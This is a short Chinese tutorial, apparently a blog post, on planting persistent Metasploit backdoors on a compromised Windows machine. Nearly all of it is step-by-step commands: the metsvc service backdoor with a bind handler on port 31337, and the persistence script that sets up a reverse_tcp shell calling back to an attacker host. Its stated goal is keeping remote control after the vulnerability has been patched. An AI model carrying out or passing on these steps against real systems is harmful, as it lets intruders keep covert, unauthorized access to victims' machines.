metasploit永久后门简介
- 利用漏洞获取的meterpreter shell 运行于内存中,重启失效。
- 重复利用exploit 漏洞可能造成程序崩溃
- 持续永久后门保证漏洞修复后仍可以远程控制
metsvc永久后门
1.生成metsvc后门
run metsvc -A
2.启用侦听模块,设置指定metsvc_bind_tcp payload(metsvc默认侦听端口31337)
use exploit/multi/handler
set payload windows/metsvc_bind_tcp

3.设置目标端口
set lport 31337

4.设置目标ip地址
set rhost 192.168.3.44

5.运行侦听模块
run

persistence永久后门
1.查看帮助信息
run persistence -h

2.生成永久后门,设置反弹ip及端口。
run persistence -X -i 10 -p 4444 -r 192.168.3.33

3.使用侦听模块,使用reverse_tcp payload。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

4.设置回连ip地址。
set lhost 192.168.3.33

5.运行侦听模块。
run

到此就完成了metasploit永久后门的介绍,如果想了解更多的Kali工具,请关注我!
爱站程序员基地


